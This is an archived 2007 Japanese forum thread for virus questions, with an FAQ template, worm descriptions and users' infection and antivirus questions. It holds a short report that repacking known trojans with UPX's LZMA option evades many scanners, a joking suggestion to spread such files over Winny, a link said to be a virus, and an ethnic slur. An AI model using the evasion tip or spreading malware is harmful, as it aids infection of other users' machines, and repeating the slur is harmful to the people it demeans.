【ウィルス情報質問　総合スレッド★Part43】

前スレ ＝ 【ウィルス情報質問　総合スレッド★Part42】
　　　　　　http://pc11.2ch.net/test/read.cgi/sec/1171809750/

★質問用テンプレ★
【使用OS】　「」
【Microsoft Update（MU）の状態】　「」　
【使用セキュリティソフトとバージョン】　「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「」　
【スパイウェア対策ソフト】　「」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「」
【ルータの有無】　「」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「」

【どんな症状が出るか】　「」
【症状が出る前に何をやったか】　「」
【症状を解決しようとどのような処置を取ったか】　「」
【その他の質問】　「」

テンプレは>>2-13

■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです！
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう！
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■　　※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社　http://www.trendmicro.co.jp/home/
　製品名：ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック　http://www.symantec.com/region/jp/
　製品名：NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC （バーテックスリンクより移管）http://www.vintage-solutions.com/Japanese/
製品名：ANTIDOTE （アンチドート）
・株式会社アラジンジャパン　http://www.aladdin.co.jp
　製品名：eSafeProtect
・コンピュータアソシエイツ株式会社　http://www.caj.co.jp/
　製品名：InocuLAN、CheyenneAntiVirus
・マカフィー株式会社　http://www.mcafee.com/jp/default.asp
　製品名：McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
　http://www.nai.com/japan/download/dat3end.asp　（リンク切れ）
　該当する場合は諦めてノートンかウィルスバスターを買いましょう。

■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
　→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意！
　→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない！
　→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう！
　→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
　→怪しいファイルにウィルスが混入しているケースもよくあることです。
　　怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を！ ■■
　もしウィルスを発見したり、感染してしまったら届け出をしましょう！
★IPAセキュリティセンター　コンピュータウイルスに関する届出について
　http://www.ipa.go.jp/security/outline/todokede-j.html
　こちらに届け出の方法などが記載されています。
　E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。

ボットにご注意！！
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者（以下「攻撃者」という）が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット（Robot）に似ているところから、ボット（BOT)と呼ばれています。

ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜

サイバークリーンセンター　ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO　ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ！(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security

W32.Sasser.Wormとその亜種にご注意！！
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D

Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html

「W32/Netsky」ウイルスの亜種（Netsky.Q）に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名：　以下のいずれかひとつ
　　* Mail Delivery System (＜受取人メールアドレス＞)
　　* Failure (＜受取人メールアドレス＞)
　　* Delivered Message (＜受取人メールアドレス＞)
　　* Deliver Mail (＜受取人メールアドレス＞)
　　* Delivery Error (＜受取人メールアドレス＞)
・添付ファイル名：　{ message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
　　　例： date7386.pif 、 message19392.zip など

「W32/Mydoom」（別名：Novarg）ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス（From）：　コンピュータから取得できたアドレスを詐称。
・件名：（以下の候補のいずれかを選択）
　　* Error
　　* Status
　　* Server Report
　　* Mail Transaction Failed
　　* Mail Delivery System
　　* hello
　　* hi
　　[ 任意の文字列 ]
・本文：（以下の候補のいずれかを選択）
　　"test"
　　"The message contains Unicode characters and has been sent as a binary attachment."
　　"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
　　"Mail transaction failed. Partial message is available."
　　[ 任意の文字列 ]　　[ 空白 ]
・添付ファイル名：　ランダムなアルファベット

「既出です」Q&A
Q1．ノートンを使っていたら、２ｃｈのログからウィルスを発見しました。
　　　ノートンをインストールしたら2chに書けなくなりました。
A1．ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2．ウィルスを検出しましたが、どんなウィルスかわかりません
A2．各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
　　デスクトップの背景が蓮画像になってしまいます 。
A3．Winny関連ウィルスですので、Download板へどうぞ。
　　ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part60
http://tmp6.2ch.net/test/read.cgi/download/1170937127/

Q4．アンチウィルスソフトを持っていないのですが、無料のものはないですか？
A4．このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part10
http://pc10.2ch.net/test/read.cgi/sec/1169042051/

Q5．ホームページが変なページになってしまいます
A5．ウィルスではなくスパイウェアですので、こちらへどうぞ
【総合】スパイウェア予防駆除 Part12
http://pc10.2ch.net/test/read.cgi/sec/1162181635/

感染の疑いがあり自分のアンチウイルスソフトで反応がない場合
他社のオンラインスキャンをするとウイルスが検出されることがあります

カスペルスキー：オンライン ウイルス＆スパイウェアスキャナ　
http://www.kaspersky.co.jp/scanforvirus/
シマンテック・セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
トレンド　フレックス
http://trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
BitDefender Online Scanner
http://www.bitdefender.com/scan8/ie.html
削除可
Panda ActiveScan
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
F-Secure オンラインスキャナ
http://www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
http://www.viruschaser.jp/support_online.html

関連スレッド
オンラインによるウイルスチェックサービス
http://pc10.2ch.net/test/read.cgi/sec/1031073684/

※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします

関連スレッド
セキュリティ初心者質問スレッドpart82
http://pc10.2ch.net/test/read.cgi/sec/1171285882/
Winnyを狙ったワーム・ニュイルス情報 Part60
http://tmp6.2ch.net/test/read.cgi/download/1170937127/
☆☆トロイの木馬☆☆4台目
http://pc10.2ch.net/test/read.cgi/sec/1171000137/
sasser【スタコラサッサ】sasser　Part２
http://pc10.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ　part5
http://pc10.2ch.net/test/read.cgi/sec/1065964513/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc10.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc10.2ch.net/test/read.cgi/sec/1027753135/
毎日ｳｨﾙｽﾒｰﾙが送られてくるのですが･･2通目
http://pc10.2ch.net/test/read.cgi/sec/1086494732/
【分析】HijackThis【研究】
http://pc10.2ch.net/test/read.cgi/sec/1091346741/

関連スレは次スレに移行してる場合もあります。

質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/

テンプレはここまで！

| ヽ｜　　 　 　|＿　　　　「 〉
⊥　人_　　　＿|＿　　　　|/
　　　　　　　　　　　　　　 O

関連スレのリンク切れの修正はお願いします。
疲れたな・・・・あとは任せる

黄金週間中なのに乙

P2P(Winny、Share、etc.)ウイルスは板違い。移動しろ。
たとえアップローダで踏んだとしても移動しろ。

Download
http://tmp6.2ch.net/download/

キンタマ、山田、ニュイルスなどでスレ探せ。

>>13
■P2Pでウイルスに感染した人へ■
『自力で解決を図るか、それが出来ないならリカバリ（OS再インストール）して下さい』

Q.バックアップを取るのを忘れてしまったのですが…
A.勉強だと思って諦めてください
Q.何とかなりませんかねー？
A.P2P使用による感染のサポートはここでは一切しておりません
Q.そこを何とか！
A.ではこちらへ↓Winnyを狙ったワーム・ニュイルス情報 Part61
　　　　　　　　　http://tmp6.2ch.net/test/read.cgi/download/1175566815/

これだろ、前ｽﾚ>>992の希望で削除されたみたい

>>14
992のは、★質問用テンプレ★ が、1と被ってるから、要らないと言ったんじゃないのか?

アップローダで踏んだケースも板違いだ、移動しろというのはいかがなものか。

>>15
そっか、次回からテンプレは１２で収まるな

>>16
キンタマや山田や原田をここで延々やるのも違うだろ?

■2007年2月最新の総合的なアンチウイルス性能テスト結果。
　（av-comparatives.orgという専門組織のテスト）

※ウイルス定義パターン検出＋ヒューリスティック検出の総合性能※
http://pc11.2ch.net/test/read.cgi/sec/1087037111/336

>>18
確かにな。ノウハウもあっちのがあるし

【使用OS】ｘｐ　
【Microsoft Updateの状態】　最新
【使用セキュリティソフトとバージョン】　avst
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　最新
【スパイウェア対策ソフト】　spy-bot　ad-ware　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　最新
【ルータの有無】　有り
【症状】　ad-wareでスキャンしたら『win32．hacktool.toolevld』っていうのが見つかりました
ググっても英語でぜんぜんわかりません
どういうウイルスなのかおしえてください

>>21
アドで検出されたんならスパイウェアです

>>21
『win32．hacktool.toolevld』自動翻訳
ttp://translate.google.com/translate?hl=ja&sl=en&u=http://www.lavasoftsupport.com/lofiversion/index.php/t3388.html&sa=X&oi=translate&resnum=1&ct=result&prev=/search%3Fq%3Dhacktool%2Btoolevld%26hl%3Dja%26lr%3D
フォーラム自動翻訳
ttp://translate.google.com/translate?hl=ja&sl=en&u=http://www.lavasoftsupport.com/index.php%3Fshowtopic%3D3388%26mode%3Dthreaded&sa=X&oi=translate&resnum=2&ct=result&prev=/search%3Fq%3Dhacktool%2Btoolevld%26hl%3Dja%26rlz%3D1T4GGLJ_jaJP209JP209

★質問用テンプレ★　　長いけれどよろしくです！
【使用OS】　XP SP2　P4 2GHz-M 512GB
【Microsoft Update（MU）の状態】　最新
【使用セキュリティソフトとバージョン】　VB2007だが 教えて欲しい
【ルータの有無】　牛社製あり

【どんな症状が出るか】　UVを外すと当時のように軽くなり、モッサリの元凶がUVソフトと感じた。
【その他の質問】　

上記のPCでVBやノートン、Mcfなど最近のものを入れるととてもストレスが溜まる。
なまじ　X2 5000+ 2GBなどと同時に使っていると尚ストレスが溜まる。
ある日リカバリ環境復元後UVなしで使っているとあまりの軽さに驚くとともにUVソフトの影響度が高いことを認識した。

そこで質問ですが、
上記のような現在では低スペックのPCでも低負荷なUVソフトはずばりどんなものでしょうか？
有償無償版問いません。　ですが、あえて有償版で軽快が売りのものは存在しますか？　
尚UV機能とFW機能のみ実装で設定はデフォとして。

それから
華美なGUIなどを廃した低スペック専用バージョンというのは有償版で存在しますか？
なければ無償版含めてある程度のUV効果を期待でき、軽快さに比重を置いたお勧めのソフト及び設定はありますか？

●日々増殖してゆくマルウエアに対しては、UVソフト自体が高負荷化するのは仕方のないことなのですか？
教えてください・・・

UVソフトファンデーションはお肌の味方です

>>24
カスペは軽いよ

>>26
情報ありがとうございます。
カスペはオンラインでしか使ったことがありませんが、巷？の評判は良いようですね。

実際使わないと判断できかねると思いますが、提灯臭くない客観的に比較しているサイト、
優位性を含んだ記述のあるソースを教えていただけないでょうか。

お時間があればでけっこうです。

>>27
ttp://www4.pf-x.net/~zot/index.htm

>>27
ttp://ratan.dyndns.info/avast4/virusest.html

・カスベは、いいよ、これで、ウイルス、全部とれた、ヨー、日本一 (2007/04/14(土) 09:22/カトチヤン)
・カスベは、いいよ、これで、ウイルス、全部とれた、ヨー、日本一 (2007/04/14(土) 09:22/カトチヤン)
・カスベは、いいよ、これで、ウイルス、全部とれた、ヨー、日本一 (2007/04/14(土) 09:22/カトチヤン)
・ノートン、アバスト、AVG、みんな、糞だよ、みんな、カスぺに、しましよ (2007/04/14(土) 09:28/デコチヤン)
・ノートン、アバスト、AVG、みんな、糞だよ、みんな、カスぺに、しましよ (2007/04/14(土) 09:28/デコチヤン)
・ノートン、アバスト、AVG、みんな、糞だよ、みんな、カスぺに、しましよ (2007/04/14(土) 09:28/デコチヤン)
・ノートン、アバスト、AVG、みんな、糞だよ、みんな、カスぺに、しましよ (2007/04/14(土) 09:29/デコチヤン)
・KIS7まだ？ (2007/04/14(土) 21:17)

28 29さん　ご紹介ありがとうございます。
さっそく拝見させていただきます。　お手数お掛けしました。

＞優位性を含んだ記述のあるソースを教えていただけないでょうか。

宣伝乙ｗ

変な言い掛かり付けるより、自分も宣伝してみたらー？

>>26
カスは重いソフト第3位
http://gigazine.net/index.php?/news/comments/20060911_system_delay/

どうしてもこの事実を抹消させたいカス業者工作員（笑）

カトチヤンとデコチヤンは同一人物だよね

＞優位性を含んだ記述のあるソースを教えていただけないでょうか。

>>26=>>34

滓な濃度32厨の自演工作 カワイソ(´･ω･) ｽ

宣伝してやろうか？

>25
これは恥ずかしい(^^ゞ　anti のAでした。　A/Vでした。

>32
なぜ？と思いましたが、結果的に宣伝になってしまうんですね。
でも精度の高い情報が欲しかったのです。

>28 29さん
一通り拝見させていただきました。
今使ってるものは　VB2007 McA2007 Norton I/S2005
動作マシンスペックに依れど、或いは使わないものは切り捨ててもどれも軽快な感じは受けません。
更に環境内容に因っても体感的に変わってくるのかも知れませんね・・・

やはり素人使用に於いては検出力、防御力などが優れているものは重くなってもしょうがない、
それを回避するならば高スペックのPCに変えるのが得策と考えるべきでしょうか。

>>39
同じようなスペックだけどNIS２００５からKIS6に乗り換えたら軽くて驚いた。

>>40
KIS6とはカスペでしょうか。
論より証拠　やはり一度使ってみてからでしょうか。
その上でまた不満があればいろいろ模索してみようと思います。

というか体験版があったような気がしますのでそれで様子を見てみます。
ご助言感謝します。

と、幼稚な自演で取り繕おうとする劇団ひとりでしたｗ

明日から連休だ〜
テンプレ貼ってくれた人お疲れ様。

>24
本当はセキュ質スレ向けの質問なんだけど…まあ
＞【使用OS】　XP SP2　P4 2GHz-M 512GB
メモリが512GBってw、512MBだよな。
それで、アンチウイルス（総合型セキュリティソフト）を入れると、モッサリするってね。
常駐型セキュリティソフト入れれば重くなるのは当たり前だ。

＞尚UV機能とFW機能のみ実装で設定はデフォとして。
必要最小限の機能で使うのなら今のメモリでも問題無いんだけど、
デフォルトの設定だとな〜…やっぱり、メモリを増設するしかないかもな。

俺だったら、必要の無い常駐ソフトやサービスを無効にするな。

http://gigazine.net/index.php?/news/comments/20060720_malware/
悪意あるソフトの80％はアンチウイルスソフトが効かない

これ見るとウィルスソフトなんてどれでもいいって気になるｗ

QuickTime7.1.6出てるな

というか端から思ってたけど、デジタルで完璧なんてありえんよね
個人情報保護なんて建前だけでダダ漏れでしょｗ
そもそもアンチウイルスソフトすらまともに入れていない一般人が多いんじゃないかな
だいたいでなんとかカワセんじゃねか　運次第ｗ

「TROJ_VB.CZJ」
こんな名前のウイルスに感染したようです。
何か情報あったら教えて。

>>47
つtp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FVB%2ECZJ&VSect=P

>>48
ありがとう。
んんん何がどーなるのか、どーすればいいのか、
わからん。

多分こうじゃないか
1.アップデートでVBを最新
2.スキャンで感染したファイルを特定
3.タスクマネージャのプロセスからマルウェアを終了
4.感染したファイルを削除

1.アップデートでVBを最新
avast・ノートンの最新にはありませんでした。
2.スキャンで感染したファイルを特定
ウイルスバスター　オンラインスキャンでファイル名がわかりました。

3.タスクマネージャのプロセスからマルウェアを終了
4.感染したファイルを削除
どうやるんですか？
本当にわかりません。

書き忘れました。
ウイルスバスターでの対処法は英語のみでわかりませんでした。

Windows 98、MEなら
CTRL+ALT+DELETE
Windows NT, 2000, XP, Server 2003なら
CTRL+SHIFT+ESCと書いてあるけどウチのXPでは起動しなかったので
CTRL+ALT+DELETEでタスクマネージャを選択してプロセスタブ
イメージ名をクリックするとABC順に並んで見やすくなる
この中にあってはならないプロセス（マルウエア）があったら終了させる
どれがマルウェアかは俺にも分らんがｗ

感染ファイル削除もVB上で行うのかエクスプローラから削除するのかも分らん
と言うことでVBからの削除が出来なかったらエクスプローラからの削除を試みれば？

ありがとうございます。
エクスプローラから削除してみます。

Trend Flex Security オンラインスキャンを実行したところ
TSPY_Banker.BF というスパイウェアが検出されましたが、
どのファイルがスパイウェアなのか表示されませんでした。
スパイウェアのファイル名を知る方法はありませんか?

別にウイルスというほどのものではないが、

3台のPCのうち2台のPCのキーボードがいつの間にか106タイプじゃなくなっていて、日本語タイプの時に多少支障が出た。
ドライバ変更で対処しようとしたが、かたや106がリスト表示になく、もう一つは変更してもダメだった。

しかたなくレジストリから変更をやってみようとして、エディタを開き該当フォルダ内を見てびっくり。
「LayerDriver JPN」の他にもう一つ「LayerDriver KOR」が存在した。よく調べりゃ3台全部に。

こんなところに糞コリアンが隠れていようとは・・・レジストリに寄生するゴミなので早速削除。
まったく油断も隙もない。

で?
オチは?

【使用OS】ｘｐ　
【Microsoft Updateの状態】　最新
【使用セキュリティソフトとバージョン】　ノートン2005　ver最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　最新
【スパイウェア対策ソフト】　ad-aware　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　最新
【ルータの有無】　なし
【症状】　定期的にdrive cleanerの宣伝告知がアラート音と共に表示され、たまに海外サイトのエロHPが表示されて困ってます。
アンチスパイウェアで掃除しても定期的にスパイウェアが放り込まれてキリがありません…。
ウイルスソフトで駆除も行った所、色々見つかったので削除したんですが、kbdcui.dllがtrojan horseに感染しているらしく、先生でも検疫できず、セーフモードで削除しようとしても削除できませんでした。
検索しても対処法が見つからずに困っています。どなたか退治法を教えていただけないでしょうかorz

書き忘れ…フルパスはC:\WINDOWS\system32\kbdcui.dll です
WinAntiVirus PROの広告が表示されるのも忘れてましたorz

>>58
WinAntiVirus PROで・・・
定番過ぎて

定番すぎでしたか…
drive cleanerもWinAntiVirus PROも警告が怪しすぎたのでダウンロードもインストもしなかったんですが…
過去ログも見れないし…リカバリしかないんですかね…orz

>>58
こっちが専用スレ
http://pc11.2ch.net/test/read.cgi/sec/1162464139/

>>61
adだけなのぉてspy-botやら
他のでも試し、
ほんでな、ｼｽﾃﾑの復元は切っとかんと
復活しよるもんもあるで
まぁ、削除後は怪しげな単語で検索してみ
あったら手動で削除
気ぃ落とさんと気長にやり

kbdcui.dllがトロイっぽかったのでこっちかと思いました…
誘導感謝ですm(_ _)m

>>62 >>63
他のソフトでも試してみます。重ね重ねありがとうございましたm(_ _)m

ファイル消せないだけならunlockerで大抵のものは消せると思うけど
http://xp-delete.hp.infoseek.co.jp/tips.html

あとvundo fix を試す
http://www.higaitaisaku.com/vundofix.html

xpをsp2にしてMS update
できればルーターもいれといたほうがいい

>>58
Symantec - サポート
ttp://www.symantec.com/ja/jp/home_homeoffice/support/index.jsp
■ウイルスとリスク （スパイウェア & ウイルス駆除の相談）

>>58
2005はスパイウェアを検出できても駆除は無理だよ

質問です。データー等開く時にウイルスがあるかないか自動的にやってくれるソフトはありますか？

普通のアンチウイルスソフトはみんなやってることだが

virustotal uploader
http://blog.hispasec.com/virustotal/23

これいいわ
インストすると右クリ→送る　からvirustotalへ直行する
下手なウイルススキャンよりいいかも
しかしvt更に重くなるんだろなｗ

お前んちのパソコンも無駄に重くなるしな

入れなくていいよ

UPX3.00が出ていたのでちょっと確認してみた。
手持ちの既知の無圧縮トロイをオプション無しで固めて検知を確認した後
3.00(厳密にはベータの2.90)で新設されたLZMA(--lzmaオプション)で固めると
検知しなくなる製品がいっぱいある…。
Packerの識別と解凍はエンジン側に手入れしなきゃだめかもね。

解凍すれば検知するのだからあまりどうでもいい
VirusTotalに突っ込んでその結果が絶対だと思ってるアホどもを騙すには丁度良いが

パッカーとかステルスじゃねえし

>>75
VirusTotaはパッカー表示されるだろうがハゲ

>>77
馬鹿は発言しなくていいよ。

>>74
検知しないからと言って困る状況がほとんどない
未対応のPackerで固められた、その出所不明のファイル自体がすでに胡散臭い怪しい存在
そんなファイルがオンデマンドで検知されなかったからと言って、実行もされずにその後どうされるのやら

WinnyとかのUploadフォルダに突っ込んでしばらくニヤニヤできる

>>78

>>78

問題はマルウエア自身が毎回異なるUPX圧縮をして自身を変化させるタイプだな
まぁ、そんなのに感染したら素直にリカバリしてしまえばいいんだが

UPXの実行時解凍はファイルが作成されるわけではない
メモリ上で行われるから検知出来ないか出来ても後の祭り

ほとんど脅威に感じない

>>83
アホか
一度自分でやってみろ

>>83
ボンバー型のトロイはそうだが、大概のマルウエアは常駐ファイルを生成するから
それに反応するはず。それが>>82だったらアウトだけどな

ねむい氏
More優しく！

>>83
普通の使い方をしてたらEXEを踏むことはまずない
脆弱性だけ注意していたらいいと思う

お前は踏まないんだろうが
もらいもんのzipで踏んづけた　＞　たすけて〜ドラえも〜ん　なやつなんて結構いるだろが

>>89
あと割れの「エロゲ.exe」とか簡単に踏むやつ多いよなwwwwww。
やっぱ人につけいるならエロからだろ。

確かにIexplorer.exeのフォルダにUPX圧縮されたWS2_32.DLLのフック版を落とされたら終わりだな

もらいもんのウイルスってなんだよ
馬鹿と関係を持った自分の頭の悪さを嘆け

そういうのを見かけるって話だけど書き方が悪かったすかね

精神がウイルスに侵されてる奴はスルーしとけ

>>93
別にお前さんに言うとらん
そんな馬鹿の例など挙げるだけ無駄という話だ
八割方違法物だろ、むしろ引っかかって感染しろ

小学、中学ぐらいの年代はアプロダへのリンクで踏んじゃう
疑うことを知らないからな

>もらいもんのzipで踏んづけた　＞　たすけて〜ドラえも〜ん　なやつなんて結構いるだろが
結構いるかどうかは分からないが、いるかもしれないな。

だからなんだ。

感じるんだ

なんだそれ。　つか原田君いるかね

■新種ウイルス発生なのでご注意■

感染したPCをbot化すると思われる新種ウイルスが見つかってます。
これを検出できるアンチウイルス製品が完全に出揃っていないのでご注意ください。

無料アンチウイルスでは、BitDefender、AVG、AntiVir、Avastなどが検出できます。
有料アンチウイルスでは、McAfee、Kaspersky、F-Secureなどが検出できます。

NOD32やMicrosoft製アンチウイルスなどは、まだ検出できないので、特にご注意ください。


検出できる製品は赤字で検出名が表記されています（http://www.virustotal.com/による検証）。
http://vista.crap.jp/img/vi7878271194.png

スレ立て10日目でやっと100レスですか。
セキュ質スレでは大体10日前後で次スレですが…

まったり行きますか。

スレの特色が薄いんじゃない
>>1がイキナシもうテンプレだし
それ以降のテンプレはゴチャゴチャだし

テンプレもいまどきBlasterとかいらんだろ

＊水曜日のWindowsUpdate更新プログラムについての不具合（>>335の追記）

427 名前：名無し~3.EXE[sage] 投稿日：2007/05/09(水) 22:29:25 ID:nDIeetqy
今回のパッチ、更新検索中に、WinXP＋Office2003の環境で異様に重くなる場合あるそうな。
MSでも原因不明。svchostの奴で多少はましになるけど、責任は知らん、Officeを2007かXPにしろ
というお達しが、うちの会社で出た。

435 名前：名無し~3.EXE[sage] 投稿日：2007/05/10(木) 00:12:29 ID:FEz1XhvZ
WinXP＋Office2003の環境で重くなる件について

うちの会社ではsvchostの奴をやって
Windows Updateのページに行って、左のメニューから「設定の変更」へ行き
「Windows Update をしない」みたいのを選んだら直った。
（適用したら見えなくなったので正確な名称じゃないかも）

システムのプロパティ内「自動更新を無効にする」にチェックして適用＋OKクリック。
その後、WindowsUpdateのサイトで手動ダウンロード＆インストールする。

ADSL回線や光回線でもこの現象が見られるという報告があがってます。
WinXP＋Office2003の環境の人は気をつけてください。




＊この文章を該当しそうなスレッドにコピペしてください。
よろしくお願いしますｍ（_ _）ｍ

今頃言われてもなぁ
異様に重かったのは、やっぱ異常だったんか

Win板のUpdate失敗スレ見ろよ…

ＨＰにｇｏｏｇｌｅを登録していたのですが、いつのまにかｂｉｇｌｏｂｅに変わっていました。
ウィルスかなにかに感染してしまったのでしょうか・・・？

>>107
戻らないってことならNECｻｲﾄだか121だかに
対処方法が書かれていたと思う

【使用PC】　「SONY VAIO JX」
【使用OS】　「Windows XP (VAIO付属のもの)」
【Microsoft Update（MU）の状態】　「最新」　
【使用セキュリティソフトとバージョン】　「AVAST4.7 Home Edition」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新」　
【スパイウェア対策ソフト】　「なし」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「なし」
【ルータの有無】　「有」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「なし」

【どんな症状が出るか】　「スピーカーから不定期に『くしゃっ・・・くしゃっ』という音が出ます。年に数回OSを入れなおしますが、いつの間にか音が出ています。どなたかお分かりの方いらっしゃいませんか？」

ウイルスとか関係ねーし。
ハード(ノイズ拾ってるなど)やドライバの問題だろ。
PC一般板のVAIOスレにでも行け。

VAIO（笑）

>>109
ああ、それはウィルスで間違いないよ。
すぐに病院行って抗生剤もらってこい。

http://ime.nu/jettechcorp.com/link10627.jpg

これウイルスらしいんだけど、どんなウイルス？

programfilesの中身がどんどん消されていくウイルスって最近報告ありました？
